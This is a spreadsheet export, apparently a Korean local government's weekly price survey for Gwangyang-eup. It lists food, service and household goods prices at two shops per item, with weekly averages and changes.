[6,"생수","플라스틱 1병(500㎖)",{"$f":"COUNTIF(J91,\"<>0\")+COUNTIF(N91,\"<>0\")","v":2},{"$f":"COUNTIF(K91,\"<>0\")+COUNTIF(O91,\"<>0\")","v":2},{"$f":"IF(D91=0,0,SUM(J91,N91)/D91)","v":320},{"$f":"IF(E91=0,0,SUM(K91,O91)/E91)","v":320},{"$f":"G91-F91","v":0},"농협하나로마트",250,250,{"$f":"K91-J91","v":0},"트라이얼코리아",390,390,{"$f":"O91-N91","v":0}]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",{"$f":"COUNTIF(J92,\"<>0\")+COUNTIF(N92,\"<>0\")","v":2},{"$f":"COUNTIF(K92,\"<>0\")+COUNTIF(O92,\"<>0\")","v":2},{"$f":"IF(D92=0,0,SUM(J92,N92)/D92)","v":{"v":1680,"d":"1,680"}},{"$f":"IF(E92=0,0,SUM(K92,O92)/E92)","v":{"v":1680,"d":"1,680"}},{"$f":"G92-F92","v":0},"농협하나로마트",1670,1670,{"$f":"K92-J92","v":0},"트라이얼코리아",{"v":1690,"d":"1,690"},{"v":1690,"d":"1,690"},{"$f":"O92-N92","v":0}]
[8,"소주","1병 360㎖\n(병 보증금 포함)",{"$f":"COUNTIF(J93,\"<>0\")+COUNTIF(N93,\"<>0\")","v":2},{"$f":"COUNTIF(K93,\"<>0\")+COUNTIF(O93,\"<>0\")","v":2},{"$f":"IF(D93=0,0,SUM(J93,N93)/D93)","v":{"v":1360,"d":"1,360"}},{"$f":"IF(E93=0,0,SUM(K93,O93)/E93)","v":{"v":1360,"d":"1,360"}},{"$f":"G93-F93","v":0},"농협하나로마트",1340,1340,{"$f":"K93-J93","v":0},"트라이얼코리아",{"v":1380,"d":"1,380"},{"v":1380,"d":"1,380"},{"$f":"O93-N93","v":0}]
[9,"등유","주유소 판매 1ℓ",{"$f":"COUNTIF(J94,\"<>0\")+COUNTIF(N94,\"<>0\")","v":2},{"$f":"COUNTIF(K94,\"<>0\")+COUNTIF(O94,\"<>0\")","v":2},{"$f":"IF(D94=0,0,SUM(J94,N94)/D94)","v":{"v":1400,"d":"1,400"}},{"$f":"IF(E94=0,0,SUM(K94,O94)/E94)","v":{"v":1400,"d":"1,400"}},{"$f":"G94-F94","v":0},"역전주유소",1400,1400,{"$f":"K94-J94","v":0},"황금주유소",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},{"$f":"O94-N94","v":0}]
[10,"경유","주유소 판매 1ℓ",{"$f":"COUNTIF(J95,\"<>0\")+COUNTIF(N95,\"<>0\")","v":2},{"$f":"COUNTIF(K95,\"<>0\")+COUNTIF(O95,\"<>0\")","v":2},{"$f":"IF(D95=0,0,SUM(J95,N95)/D95)","v":{"v":1457,"d":"1,457"}},{"$f":"IF(E95=0,0,SUM(K95,O95)/E95)","v":{"v":1485,"d":"1,485"}},{"$f":"G95-F95","v":28},"역전주유소",1457,1475,{"$f":"K95-J95","v":18},"황금주유소",{"v":1457,"d":"1,457"},{"v":1495,"d":"1,495"},{"$f":"O95-N95","v":38}]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",{"$f":"COUNTIF(J96,\"<>0\")+COUNTIF(N96,\"<>0\")","v":2},{"$f":"COUNTIF(K96,\"<>0\")+COUNTIF(O96,\"<>0\")","v":2},{"$f":"IF(D96=0,0,SUM(J96,N96)/D96)","v":{"v":1541,"d":"1,541"}},{"$f":"IF(E96=0,0,SUM(K96,O96)/E96)","v":{"v":1576,"d":"1,576"}},{"$f":"G96-F96","v":35},"역전주유소",1537,1567,{"$f":"K96-J96","v":30},"황금주유소",{"v":1545,"d":"1,545"},{"v":1585,"d":"1,585"},{"$f":"O96-N96","v":40}]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",{"$f":"COUNTIF(J97,\"<>0\")+COUNTIF(N97,\"<>0\")","v":2},{"$f":"COUNTIF(K97,\"<>0\")+COUNTIF(O97,\"<>0\")","v":2},{"$f":"IF(D97=0,0,SUM(J97,N97)/D97)","v":{"v":130000,"d":"130,000"}},{"$f":"IF(E97=0,0,SUM(K97,O97)/E97)","v":{"v":130000,"d":"130,000"}},{"$f":"G97-F97","v":0},"믿음음악학원",130000,130000,{"$f":"K97-J97","v":0},"에쎌피아노",{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},{"$f":"O97-N97","v":0}]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",{"$f":"COUNTIF(J98,\"<>0\")+COUNTIF(N98,\"<>0\")","v":2},{"$f":"COUNTIF(K98,\"<>0\")+COUNTIF(O98,\"<>0\")","v":2},{"$f":"IF(D98=0,0,SUM(J98,N98)/D98)","v":{"v":145000,"d":"145,000"}},{"$f":"IF(E98=0,0,SUM(K98,O98)/E98)","v":{"v":145000,"d":"145,000"}},{"$f":"G98-F98","v":0},"아트하트학원",150000,150000,{"$f":"K98-J98","v":0},"아이피카소",{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},{"$f":"O98-N98","v":0}]

{"sheet":"광양읍2","index":2,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(광양읍)"]
[{"$nulls":12},"조사자 : 김국희"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(광양마트)",{"$nulls":3},"조 사 2 지 역(시장)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주",null,"증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg(광양좋은쌀)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":61000,"d":"61,000"}},{"$f":"IF(E7=0,0,SUM(K7,O7)/E7)","v":{"v":61000,"d":"61,000"}},{"$f":"G7-F7","v":0},"광양마트",{"v":66000,"d":"66,000"},{"v":66000,"d":"66,000"},{"$f":"K7-J7","v":0},"시장",{"v":56000,"d":"56,000"},{"v":56000,"d":"56,000"},{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},2,{"$f":"IF(D8=0,0,SUM(J8,N8)/D8)","v":{"v":2250,"d":"2,250"}},{"v":2000,"d":"2,000"},{"$f":"G8-F8","v":-250},"광양마트",{"v":2500,"d":"2,500"},{"v":2000,"d":"2,000"},0,"시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},{"$f":"O8-N8","v":0}]
[3,"상추","잎상추 500g",2,2,{"v":6250,"d":"6,250"},{"v":6250,"d":"6,250"},{"$f":"G9-F9","v":0},"광양마트",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},{"$f":"K9-J9","v":0},"시장",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[4,"양상추","상품1개(350~400g)",2,2,{"v":2750,"d":"2,750"},{"v":2750,"d":"2,750"},{"$f":"G10-F10","v":0},"광양마트",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"로컬푸드",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[5,"애호박","상품1개(300~350g)",2,2,{"v":2950,"d":"2,950"},{"v":2950,"d":"2,950"},{"$f":"G11-F11","v":0},"광양마트",{"v":3900,"d":"3,900"},{"v":3900,"d":"3,900"},0,"시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[6,"열무","상품 4kg(1단)",2,2,{"v":9400,"d":"9,400"},{"v":9400,"d":"9,400"},{"$f":"G12-F12","v":0},"로컬푸드",{"v":8800,"d":"8,800"},{"v":8800,"d":"8,800"},0,"시장",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[7,"양파","1망 1kg",2,2,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},{"$f":"G13-F13","v":0},"광양마트",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,"시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[8,"오이","상품 3개",2,2,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"광양마트",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"시장",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0]
[9,"풋고추","신선한것 1kg",2,2,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,"광양마트(청양)",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"시장",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[10,"마늘","깐것 상품 1kg",2,2,{"v":11500,"d":"11,500"},{"v":11500,"d":"11,500"},0,"광양마트",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"시장",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[11,"감자","흰색 1kg",2,2,{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"광양마트",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[12,"배추","1포기 3kg",{"$f":"COUNTIF(J18,\"<>0\")+COUNTIF(N18,\"<>0\")","v":2},2,{"v":3650,"d":"3,650"},{"v":3650,"d":"3,650"},0,"로컬푸드",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"시장",{"v":3300,"d":"3,300"},{"v":3300,"d":"3,300"},0]
[13,"콩나물","1봉지 500g ",2,2,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"광양마트",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[14,"사과","상품 1개(300∼350g)",2,2,{"v":3725,"d":"3,725"},{"v":3725,"d":"3,725"},0,"광양마트",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"로컬푸드",{"v":2950,"d":"2,950"},{"v":2950,"d":"2,950"},0]
[15,"배","상품 1개(650∼700g)",2,2,{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"광양마트",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"로컬푸드",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[16,"바나나","상품 1kg",2,2,{"v":3500,"d":"3,500"},{"v":3550,"d":"3,550"},50,"광양마트",{"v":3700,"d":"3,700"},{"v":3700,"d":"3,700"},0,"로컬푸드",{"v":3300,"d":"3,300"},{"v":3400,"d":"3,400"},100]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,{"v":60500,"d":"60,500"},{"v":60500,"d":"60,500"},0,"로컬푸드",{"v":63000,"d":"63,000"},{"v":63000,"d":"63,000"},0,"시장(정육점)",{"v":58000,"d":"58,000"},{"v":58000,"d":"58,000"},0]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",2,2,{"v":27900,"d":"27,900"},{"v":27900,"d":"27,900"},0,"광양마트",{"v":40800,"d":"40,800"},{"v":40800,"d":"40,800"},0,"시장(정육점)",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[19,"돼지고기","삼겹살 600g(상등육)",2,2,{"v":16450,"d":"16,450"},{"v":16450,"d":"16,450"},0,"광양마트",{"v":15900,"d":"15,900"},{"v":15900,"d":"15,900"},0,"시장(정육점)",{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"v":8250,"d":"8,250"},{"v":8250,"d":"8,250"},0,"광양마트",{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},{"$f":"K26-J26","v":0},"시장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[21,"달걀","특란 30개 한판",2,2,{"v":8400,"d":"8,400"},{"v":8250,"d":"8,250"},-150,"광양마트",{"v":9800,"d":"9,800"},{"v":9500,"d":"9,500"},-300,"시장",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[22,"조기","15cm 1마리",{"$f":"COUNTIF(J28,\"<>0\")+COUNTIF(N28,\"<>0\")","v":2},2,{"v":2750,"d":"2,750"},{"v":2750,"d":"2,750"},0,"광양마트",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[23,"갈치","60cm 1마리",2,2,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"광양마트",{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,"시장",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[24,"명태","40cm 1마리",2,2,{"v":4700,"d":"4,700"},{"v":4700,"d":"4,700"},0,"광양마트",{"v":4900,"d":"4,900"},{"v":4900,"d":"4,900"},0,"시장",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0]
[25,"고등어","30cm 1마리",{"$f":"COUNTIF(J31,\"<>0\")+COUNTIF(N31,\"<>0\")","v":2},2,{"v":4550,"d":"4,550"},{"v":4550,"d":"4,550"},0,"광양마트",{"v":5600,"d":"5,600"},{"v":5600,"d":"5,600"},0,"시장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[26,"냉동오징어","30cm 1마리",2,2,{"v":5650,"d":"5,650"},{"v":5650,"d":"5,650"},0,"광양마트",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"시장",{"v":6800,"d":"6,800"},{"v":6800,"d":"6,800"},0]
[27,"콩","상품 1kg",2,2,null,{"v":8400,"d":"8,400"},{"v":8400,"d":"8,400"},"로컬푸드",{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0,"시장",{"v":8300,"d":"8,300"},{"v":8300,"d":"8,300"},0]
[28,"고춧가루","상품 3kg",2,2,null,100000,100000,"광양마트",110000,110000,0,"시장",90000,90000,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},{"$f":"COUNTIF(K36,\"<>0\")+COUNTIF(O36,\"<>0\")","v":2},{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":9000,"d":"9,000"}},{"$f":"IF(E36=0,0,SUM(K36,O36)/E36)","v":{"v":9000,"d":"9,000"}},{"$f":"G36-F36","v":0},"이정재식육식당(곰탕)",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"종갓집국밥",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},2,{"$f":"IF(D37=0,0,SUM(J37,N37)/D37)","v":{"v":9000,"d":"9,000"}},{"v":9000,"d":"9,000"},{"$f":"G37-F37","v":0},"진주냉면",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,"대갓집",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[3,"비빔밥","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"전주비빔밥",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"사랑분식",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[4,"갈비탕","1인분(보통)",2,2,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"진주냉면",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"대갓집",{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0]
[5,"삼계탕","1인분(보통)",2,2,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,"수양정",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"황제삼계탕",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0]
[6,"된장찌개\n백반","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"금송숯불구이",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"만수정",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[7,"김치찌개\n백반","1인분(보통)",2,2,{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0,"금송숯불구이",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"만수정",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"행복한 한우",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"삼대불고기",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,{"v":46000,"d":"46,000"},{"v":46000,"d":"46,000"},0,"ok목장",{"v":36000,"d":"36,000"},{"v":36000,"d":"36,000"},0,"백운뜰",{"v":56000,"d":"56,000"},{"v":56000,"d":"56,000"},0]
[10,"생선초밥","1인분(보통), 활어기준",2,2,{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0,"먹어섬",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"정스시",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0]
[11,"튀김닭","양념통닭 1마리",2,2,{"v":19000,"d":"19,000"},{"v":19000,"d":"19,000"},0,"들녁숯불바베큐",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,"냠냠닭컴",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0]
[12,"칼국수","1인분(보통)",2,2,{"v":7250,"d":"7,250"},{"v":7250,"d":"7,250"},0,null,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"사랑분식",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0]
[13,"조리라면","분식점 1인분",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"사랑분식",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"바오밥",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[14,"김밥","분식점 1인분",2,2,{"v":3250,"d":"3,250"},{"v":3250,"d":"3,250"},0,"사랑분식",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,"바오밥",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[15,"짜장면","1인분(보통)",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"행복한젠시오",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"신흥일각",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[16,"짬뽕","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"행복한젠시오",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"신흥일각",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[17,"탕수육","일반탕수육(보통)",2,2,{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"행복한젠시오",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"신흥일각",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0]
[18,"돈가스","일반돈가스,1인분",2,2,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,"사랑분식",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"피노아르떼소나무집",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[19,"햄버거","기본형(야채,고기)",2,2,{"v":4100,"d":"4,100"},{"v":4100,"d":"4,100"},0,"롯데리아",{"v":4700,"d":"4,700"},{"v":4700,"d":"4,700"},0,"맘앤파파",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[20,"피자","기본형(야채,고기)",2,2,{"v":13900,"d":"13,900"},{"v":13900,"d":"13,900"},0,"피자스쿨",{"v":13900,"d":"13,900"},{"v":13900,"d":"13,900"},0,"피자마루",{"v":13900,"d":"13,900"},{"v":13900,"d":"13,900"},0]
[21,"커피(외식)","일반원두커피",2,2,{"v":3150,"d":"3,150"},{"v":3150,"d":"3,150"},0,"까페345",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"코코베르나",{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"까페345",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"코코베르나",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,{"v":15300,"d":"15,300"},{"v":15300,"d":"15,300"},0,"만수정",{"v":17300,"d":"17,300"},{"v":17300,"d":"17,300"},0,"금송",{"v":13300,"d":"13,300"},{"v":13300,"d":"13,300"},0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"대갓집",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"금송",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[25,"갈비살","식육식당 200g(국내산)",2,2,{"v":44925,"d":"44,925"},{"v":44925,"d":"44,925"},0,"ok목장",{"v":36000,"d":"36,000"},{"v":36000,"d":"36,000"},0,"금목서",{"v":53850,"d":"53,850"},{"v":53850,"d":"53,850"},0]
[26,"생맥주","500CC 1잔",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"들녁숯불바베큐",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"냠냠닭컴",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,{"v":51770,"d":"51,770"},{"v":51770,"d":"51,770"},0,"칠성주공a",{"v":57900,"d":"57,900"},{"v":57900,"d":"57,900"},0,"부영아파트",{"v":45640,"d":"45,640"},{"v":45640,"d":"45,640"},0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"매화세탁소",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"강남세탁소",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"매화세탁소",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"강남세탁소",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",2,2,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"칠성볼링장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,{"$nulls":3},0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,{"v":75000,"d":"75,000"},{"v":75000,"d":"75,000"},0,"덕산골프장",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},0,{"$nulls":3},0]
[35,"노래방\n이용료","일반인 저녁 1시간",2,2,{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"칠성노래방",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"고래고래",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,{"v":10900,"d":"10,900"},{"v":10900,"d":"10,900"},0,"월드당구장",{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,"자니스당구장",{"v":10800,"d":"10,800"},{"v":10800,"d":"10,800"},0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,{"v":18500,"d":"18,500"},{"v":18500,"d":"18,500"},0,"리사진관",{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0,"중앙사진관",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,400,400,0,"리사진관",300,300,0,"중앙사진관",500,500,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",1,2,0,0,0,"대여클럽",0,null,0,{"$nulls":3},0]
[40,"이용료(컷트)","성인조발 중류급 1회",2,2,{"v":14500,"d":"14,500"},{"v":14500,"d":"14,500"},0,"옥룡이용원",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"숲샘이용원",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[41,"미용료","성인여자 파마(일반)",2,2,{"v":32500,"d":"32,500"},{"v":32500,"d":"32,500"},0,"모아헤어삽",{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0,"헤어터치",{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"베스파",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"대호탕",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",2,2,0,0,0,{"$nulls":7},0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",2,2,{"v":37500,"d":"37,500"},{"v":37500,"d":"37,500"},0,"롯데모텔",{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0,"J1모텔",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[46,"PC방\n이용료","1회 이용시",2,2,{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"아이센스",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0,"인터빌리아",{"v":1300,"d":"1,300"},{"v":1300,"d":"1,300"},0]
[47,"택배이용료","20kg이하, 타지역",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"CJ택배",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"한진택배",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},{"$f":"COUNTIF(K86,\"<>0\")+COUNTIF(O86,\"<>0\")","v":2},{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":6050,"d":"6,050"}},{"$f":"IF(E86=0,0,SUM(K86,O86)/E86)","v":{"v":6050,"d":"6,050"}},{"$f":"G86-F86","v":0},"참마트",{"v":6200,"d":"6,200"},{"v":6200,"d":"6,200"},0,"백운마트",{"v":5900,"d":"5,900"},{"v":5900,"d":"5,900"},0]
[2,"두부","공장제품 1모",{"$f":"COUNTIF(J87,\"<>0\")+COUNTIF(N87,\"<>0\")","v":2},2,{"$f":"IF(D87=0,0,SUM(J87,N87)/D87)","v":{"v":1475,"d":"1,475"}},{"v":1475,"d":"1,475"},{"$f":"G87-F87","v":0},"참마트",{"v":1450,"d":"1,450"},{"v":1450,"d":"1,450"},0,"백운마트",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,"참마트",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,"백운마트",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0]
[4,"식용유","콩기름 1.8ml",2,2,{"v":8850,"d":"8,850"},{"v":8850,"d":"8,850"},0,"참마트",{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},0,"백운마트",{"v":8200,"d":"8,200"},{"v":8200,"d":"8,200"},0]
[5,"설탕","정백당 1kg",2,2,{"v":3250,"d":"3,250"},{"v":3250,"d":"3,250"},0,"참마트",{"v":3300,"d":"3,300"},{"v":3300,"d":"3,300"},0,"백운마트",{"v":3200,"d":"3,200"},{"v":3200,"d":"3,200"},0]
[6,"생수","플라스틱 1병(500㎖)",2,2,425,425,0,"참마트",400,400,0,"백운마트",450,450,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,{"v":1875,"d":"1,875"},{"v":1875,"d":"1,875"},0,"참마트",{"v":1950,"d":"1,950"},{"v":1950,"d":"1,950"},0,"백운마트",{"v":1800,"d":"1,800"},{"v":1800,"d":"1,800"},0]
